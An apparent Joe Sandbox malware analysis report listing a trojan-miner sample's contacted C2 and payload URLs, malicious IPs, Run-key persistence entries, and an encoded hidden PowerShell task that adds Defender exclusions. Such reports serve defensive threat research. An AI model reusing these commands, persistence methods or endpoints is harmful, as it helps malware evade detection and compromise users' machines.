http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	52i.exe, 00000003.00000002.1762236134.00000202E7D4F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000B.00000002.2226385244.0000020359561000.00000004.00000800.00020000.00000000.sdmp, FRaqbC8wSA1XvpFVjCRGryWt.exe, 00000011.00000002.2156164658.0000000003011000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2051647717.000001CD18A7F000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001A.00000002.4131368164.0000020D46AE1000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.microsoft.co	52i.exe, 00000003.00000002.1758329258.0000020280AD9000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/HX	Cerker.exe, 0000002F.00000003.2309884036.000000000106E000.00000004.00000020.00020000.00000000.sdmp	false
https://g.live.com/1rewlive5skydrive/OneDriveProductionV2?OneDriveUpdate=9c123752e31a927b78dc96231b6	svchost.exe, 00000001.00000003.1637375313.0000025614AC2000.00000004.00000800.00020000.00000000.sdmp, edb.log.1.dr, qmgr.db.1.dr	false
http://185.215.113.19/CoreOPT/index.php?scr=1f	RegAsm.exe, 0000002D.00000002.2148146374.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/qrXlYUQv	Cerker.exe, 0000002F.00000003.2466400626.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2634187209.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2453082954.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	false
https://api.ip.sb/ip	xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003248000.00000004.00000800.00020000.00000000.sdmp	false
https://fusionflow-meta.net/hy	Cerker.exe, 0000002F.00000003.2634227201.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2659776588.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2646270754.000000000106D000.00000004.00000020.00020000.00000000.sdmp	false
https://stackoverflow.com/q/14436606/23354	IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, YAPNXRPmcarcR4ZDgC81Tbdk.exe, 00000026.00000002.2144035452.00000209CF2A9000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.000001815802D000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.php~$	RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	false
http://pesterbdd.com/images/Pester.png	powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/soap/encoding/	powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	false
http://www.apache.org/licenses/LICENSE-2.0.html	powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.php369.jpg	RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	false
http://185.216.214.225/freedom.exe9Q#	Cerker.exe, 00000008.00000003.1843946160.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1844836338.0000000001707000.00000004.00000020.00020000.00000000.sdmp	false
http://www.google.com/bot.html)	mswabnet.exe, 00000032.00000002.4125195171.0000000002961000.00000004.00000800.00020000.00000000.sdmp	false
https://fusionflow-meta.net/7w	Cerker.exe, 0000002F.00000003.2348735064.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/Icon	powershell.exe, 0000000B.00000002.2475758964.00000203695D7000.00000004.00000800.00020000.00000000.sdmp	false
https://fusionflow-meta.net:443/socket/?	Cerker.exe, 0000002F.00000003.2335447785.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440270925.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309975875.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309853835.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2415497371.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363742815.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2378561693.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2321860118.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363548396.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348735064.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335008330.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2401985089.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2390362622.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2322133127.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427060889.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2349814314.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	false
http://crl.ver)	svchost.exe, 00000001.00000002.3277930844.0000025614800000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.phpR$_	RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	false
https://xmrig.com/wizard	aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false
https://fusionflow-meta.net:443/socket/?id=5BCFD53E0C18D2560D8AF	Cerker.exe, 0000002F.00000003.2335447785.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309975875.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309853835.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363742815.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2321860118.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363548396.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348735064.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335008330.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2322133127.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2349814314.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.php)	RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	false
https://github.com/Pester/Pester	powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	false
https://fusionflow-meta.net/low-meta.net/	Cerker.exe, 0000002F.00000003.2378588195.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348797808.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309884036.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2363581672.000000000106C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335148342.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2390396630.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2295452460.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2321936899.000000000106E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.php?scr=1d	RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	false
http://www.carterandcone.coml	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.php-	RegAsm.exe, 00000002.00000002.2080894884.00000000014C2000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/W	Cerker.exe, 0000002F.00000003.2615950442.000000000106C000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net:443/socket/42	Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	false
http://www.fontbureau.com/designers/frere-user.html	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
https://fusionflow-meta.net:443/socket/	Cerker.exe, 00000008.00000002.2079172061.000000000135A000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050751367.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050800394.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000002.2080368416.0000000001688000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.0000000001148000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2064233085.0000000000F3A000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2378588195.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000002.4110577519.0000000001007000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2493875039.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348797808.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2453113628.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2480389569.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2561564937.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2309884036.000000000106E000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2659776588.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2533253732.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440307951.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427205502.000000000106D000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000002.4109992195.0000000000CFA000.00000004.00000010.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2295452460.000000000106E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.phpZ	RegAsm.exe, 00000002.00000002.2080894884.000000000155A000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/T	Cerker.exe, 0000002F.00000003.2575856954.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2348735064.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	false
http://schemas.xmlsoap.org/wsdl/	powershell.exe, 0000000B.00000002.2226385244.000002035978A000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.16/inc/ovrflw.exe	RegAsm.exe, 00000002.00000002.2088920952.00000000040B0000.00000004.00000020.00020000.00000000.sdmp	false
http://www.googlebot.com/bot.html)6	ovrflw.exe, 00000012.00000002.1851294717.0000000002651000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000013.00000002.2064032593.0000000003291000.00000004.00000800.00020000.00000000.sdmp, mswabnet.exe, 00000020.00000002.1954592893.0000000002971000.00000004.00000800.00020000.00000000.sdmp	false
http://185.216.214.225/Jhiidutz.exev	Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/h	Cerker.exe, 0000002F.00000003.2378561693.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2335008330.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2401985089.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2390362622.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/g	Cerker.exe, 00000014.00000002.2065013682.000000000119B000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453E79B	Cerker.exe, 0000002F.00000003.2521012113.000000000109C000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2415545496.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2547413407.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2466473691.0000000001061000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2590313117.0000000001062000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2521012113.0000000001061000.00000004.00000020.00020000.00000000.sdmp	false
https://xmrig.com/benchmark/%s	aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D57D21000.00000004.00000800.00020000.00000000.sdmp, AddInProcess.exe, 0000002E.00000002.4108997136.0000000140465000.00000040.00000400.00020000.00000000.sdmp	false
https://fusionflow-meta.net/l	Cerker.exe, 00000014.00000002.2065013682.00000000011FA000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2440270925.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2646235985.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2547379699.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2590276721.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2480270807.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/n	Cerker.exe, 0000002F.00000002.4110577519.000000000104D000.00000004.00000020.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.phpH	RegAsm.exe, 0000002D.00000002.2148146374.0000000000D46000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/anci	Cerker.exe, 0000002F.00000002.4110577519.000000000104D000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/b	Cerker.exe, 00000014.00000002.2065013682.00000000011FA000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/jv	Cerker.exe, 0000002F.00000003.2561516266.00000000010AF000.00000004.00000020.00020000.00000000.sdmp	false
http://www.fontbureau.com/designersG	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
http://schemas.m	IIZS2TRqf69aZbLAX3cf3edn.exe, 00000017.00000002.2340144406.000001CD31683000.00000004.00000020.00020000.00000000.sdmp	false
http://www.fontbureau.com/designers/?	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
http://www.founder.com.cn/cn/bThe	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
https://github.com/mgravell/protobuf-netJ	52i.exe, 00000003.00000002.1805008168.00000202F80F5000.00000004.00000800.00020000.00000000.sdmp, 52i.exe, 00000003.00000002.1749075284.0000020280530000.00000004.08000000.00040000.00000000.sdmp, 52i.exe, 00000003.00000002.1805008168.00000202F8196000.00000004.00000800.00020000.00000000.sdmp, TypeId.exe, 0000000C.00000002.2145743704.000001D9AAA0C000.00000004.00000800.00020000.00000000.sdmp, aspnet_compiler.exe, 0000001A.00000002.4181122584.0000020D570FC000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2092329177.000002B28006E000.00000004.00000800.00020000.00000000.sdmp, IIZS2TRqf69aZbLAX3cf3edn.exe, 00000025.00000002.2158620640.000002B290676000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F90000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.0000018168445000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2078804630.00000181684E6000.00000004.00000800.00020000.00000000.sdmp, SmLAztxc1o8yfogkJXrRjbDt.exe, 00000028.00000002.2065045219.0000018157F36000.00000004.00000800.00020000.00000000.sdmp	false
http://185.215.113.19/CoreOPT/index.phpbH	RegAsm.exe, 0000002D.00000002.2148146374.0000000000CEA000.00000004.00000020.00020000.00000000.sdmp	false
http://www.fontbureau.com/designers?	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
https://fusionflow-meta.net:443/socket/?id=5BCFD53E0C18D2560D8AF0E193E31ACDB2D149DF00761FAB60CCD9453	Cerker.exe, 0000002F.00000003.2322133127.00000000010B3000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2427060889.00000000010AF000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 0000002F.00000003.2349814314.00000000010B3000.00000004.00000020.00020000.00000000.sdmp	false
https://fusionflow-meta.net/AppData	Cerker.exe, 0000002F.00000003.2466473691.000000000106E000.00000004.00000020.00020000.00000000.sdmp	false
http://185.216.214.225/Jhiidutz.exeSN	Cerker.exe, 00000008.00000002.2080368416.000000000172A000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1906992557.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2026314308.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1972256140.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2025971986.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050751367.0000000001704000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.2050800394.0000000001728000.00000004.00000020.00020000.00000000.sdmp, Cerker.exe, 00000008.00000003.1989324205.0000000001729000.00000004.00000020.00020000.00000000.sdmp	false
http://185.216.214.225/Jhiidutz.exet	Cerker.exe, 00000008.00000003.1972256140.0000000001704000.00000004.00000020.00020000.00000000.sdmp	false
https://contoso.com/License	powershell.exe, 0000000B.00000002.2475758964.00000203695D7000.00000004.00000800.00020000.00000000.sdmp	false
http://www.tiro.com	trSK2fqPeB.exe, 00000000.00000002.1650231614.000000001C872000.00000004.00000800.00020000.00000000.sdmp	false
https://api.ip.s	xzzrvckwuia.exe, 00000029.00000002.2145857389.0000000003248000.00000004.00000800.00020000.00000000.sdmp	false

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
104.21.21.16	tmpfiles.org	United States	13335	CLOUDFLARENETUS	false
185.215.113.19	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	true
185.215.113.16	unknown	Portugal	206894	WHOLESALECONNECTIONSNL	false
140.82.121.4	github.com	United States	36459	GITHUBUS	false
208.95.112.1	ip-api.com	United States	53334	TUT-ASUS	true
185.216.214.225	exonic-hacks.com	Germany	205388	SERVERDISCOUNTERserverdiscountercomDE	true
172.67.143.156	2x.si	United States	13335	CLOUDFLARENETUS	true
161.35.34.195	rx-eu-lon.unminable.com	United States	14061	DIGITALOCEAN-ASNUS	true
188.114.96.3	fusionflow-meta.net	European Union	13335	CLOUDFLARENETUS	true
185.208.158.114	unknown	Switzerland	34888	SIMPLECARRER2IT	false
185.196.10.120	unknown	Switzerland	42624	SIMPLECARRIERCH	false
185.199.110.133	objects.githubusercontent.com	Netherlands	54113	FASTLYUS	false

Private

IP
127.0.0.1

General Information

Joe Sandbox version:	40.0.0 Tourmaline
Analysis ID:	1502281
Start date and time:	2024-08-31 22:41:07 +02:00
Joe Sandbox product:	CloudBasic
Overall analysis duration:	0h 15m 46s
Hypervisor based Inspection enabled:	false
Report type:	full
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of analysed new started processes analysed:	50
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	1
Technologies:	HCA enabled EGA enabled AMSI enabled
Analysis Mode:	default
Sample name:	trSK2fqPeB.exe renamed because original name is a hash value
Original Sample Name:	4d40ebb93aa34bf94d303c07c6a7e5e5.exe
Detection:	MAL
Classification:	mal100.troj.spyw.evad.mine.winEXE@73/43@9/13
EGA Information:	Successful, ratio: 37.5%
HCA Information:	Failed
Cookbook Comments:	Found application associated with file extension: .exe Override analysis time to 240000 for current running targets taking high CPU consumption

Warnings

Behavior information exceeds normal sizes, reducing to normal. Report will have missing behavior information.
Exclude process from analysis (whitelisted): MpCmdRun.exe, consent.exe, SIHClient.exe, conhost.exe, svchost.exe
Excluded IPs from analysis (whitelisted): 184.28.90.27
Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, fe3cr.delivery.mp.microsoft.com
Execution Graph export aborted for target 52i.exe, PID 7972 because it is empty
Execution Graph export aborted for target AddInProcess.exe, PID 416 because there are no executed function
Execution Graph export aborted for target HM3SOlbpH71yEXUIEAOeIiGX.exe, PID 7408 because it is empty
Execution Graph export aborted for target IIZS2TRqf69aZbLAX3cf3edn.exe, PID 7032 because it is empty
Execution Graph export aborted for target IIZS2TRqf69aZbLAX3cf3edn.exe, PID 8160 because it is empty
Execution Graph export aborted for target SmLAztxc1o8yfogkJXrRjbDt.exe, PID 7320 because it is empty
Execution Graph export aborted for target Windows.exe, PID 3156 because it is empty
Execution Graph export aborted for target Windows.exe, PID 5904 because it is empty
Execution Graph export aborted for target YAPNXRPmcarcR4ZDgC81Tbdk.exe, PID 7156 because it is empty
Execution Graph export aborted for target ix4A2DreBBsQwY6YHkidcDjo.exe, PID 7604 because it is empty
Execution Graph export aborted for target mswabnet.exe, PID 3452 because it is empty
Execution Graph export aborted for target mswabnet.exe, PID 5320 because it is empty
Execution Graph export aborted for target mswabnet.exe, PID 7692 because it is empty
Execution Graph export aborted for target ovrflw.exe, PID 3688 because it is empty
Execution Graph export aborted for target powershell.exe, PID 7452 because it is empty
HTTPS sessions have been limited to 150. Please view the PCAPs for the complete data.
Not all processes where analyzed, report is missing behavior information
Report size exceeded maximum capacity and may have missing behavior information.
Report size exceeded maximum capacity and may have missing disassembly code.
Report size exceeded maximum capacity and may have missing network information.
Report size getting too big, too many NtAllocateVirtualMemory calls found.
Report size getting too big, too many NtCreateKey calls found.
Report size getting too big, too many NtDeviceIoControlFile calls found.
Report size getting too big, too many NtOpenKey calls found.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtProtectVirtualMemory calls found.
Report size getting too big, too many NtQueryValueKey calls found.
Report size getting too big, too many NtReadVirtualMemory calls found.
Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

Simulations

Behavior and APIs

Time	Type	Description
16:41:54	API Interceptor	3x Sleep call for process: svchost.exe modified
16:41:55	API Interceptor	387x Sleep call for process: RegAsm.exe modified
16:42:05	API Interceptor	754118x Sleep call for process: Cerker.exe modified
16:42:05	API Interceptor	1x Sleep call for process: 52i.exe modified
16:42:13	API Interceptor	12x Sleep call for process: FRaqbC8wSA1XvpFVjCRGryWt.exe modified
16:42:17	API Interceptor	23x Sleep call for process: powershell.exe modified
16:42:22	API Interceptor	2x Sleep call for process: Windows.exe modified
16:42:24	API Interceptor	1x Sleep call for process: HM3SOlbpH71yEXUIEAOeIiGX.exe modified
16:42:25	API Interceptor	1x Sleep call for process: ix4A2DreBBsQwY6YHkidcDjo.exe modified
16:42:30	API Interceptor	85778x Sleep call for process: aspnet_compiler.exe modified
21:41:59	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce IlluminatedControls C:\Users\user\Pictures\Illumination.pif
21:42:04	Task Scheduler	Run new task: Cerker.exe path: C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
21:42:07	Task Scheduler	Run new task: glzvsc path: powershell.exe s>-ExecutionPolicy Bypass -WindowStyle Hidden -NoProfile -enc QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUALABDADoAXABXAGkAbgBkAG8AdwBzAFwATQBpAGMAcgBvAHMAbwBmAHQALgBOAEUAVABcAEYAcgBhAG0AZQB3AG8AcgBrADYANABcAHYANAAuADAALgAzADAAMwAxADkAXABBAGQAZABJAG4AUAByAG8AYwBlAHMAcwAuAGUAeABlACwAQwA6AFwAVQBzAGUAcgBzAFwAagBvAG4AZQBzAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXAAgAC0ARgBvAHIAYwBlADsAIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAALQBFAHgAYwBsAHUAcwBpAG8AbgBQAHIAbwBjAGUAcwBzACAAQwA6AFwAVwBpAG4AZABvAHcAcwBcAE0AaQBjAHIAbwBzAG8AZgB0AC4ATgBFAFQAXABGAHIAYQBtAGUAdwBvAHIAawA2ADQAXAB2ADQALgAwAC4AMwAwADMAMQA5AFwAQQBkAGQASQBuAFAAcgBvAGMAZQBzAHMALgBlAHgAZQAsAEMAOgBcAFUAcwBlAHIAcwBcAGoAbwBuAGUAcwBcAEEAcABwAEQAYQB0AGEAXABSAG8AYQBtAGkAbgBnAFwARwB1AGkAZABcAFQAeQBwAGUASQBkAC4AZQB4AGUA
21:42:07	Task Scheduler	Run new task: TypeId path: C:\Users\user\AppData\Roaming\Guid\TypeId.exe
21:42:08	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
21:42:17	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Network Agent "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
21:42:21	Task Scheduler	Run new task: Windows path: C:\Users\user\Windows.exe
21:42:25	Autostart	Run: HKCU\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\Windows.exe
21:42:33	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce IlluminatedControls C:\Users\user\Pictures\Illumination.pif
21:42:42	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\RunOnce Cerker.exe C:\Users\user\AppData\Local\Temp\349587345342\Cerker.exe
21:42:50	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Microsoft Network Agent "C:\Users\user\AppData\Roaming\Microsoft Network Agent\mswabnet.exe"
21:42:58	Autostart	Run: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run Windows C:\Users\user\Windows.exe

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
104.21.21.16	OmnqazpM3P.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, PureLog Stealer, RedLine, Stealc, Vidar	Browse
	SecuriteInfo.com.Win32.MalwareX-gen.20001.2923.exe	Get hash	malicious	Unknown	Browse
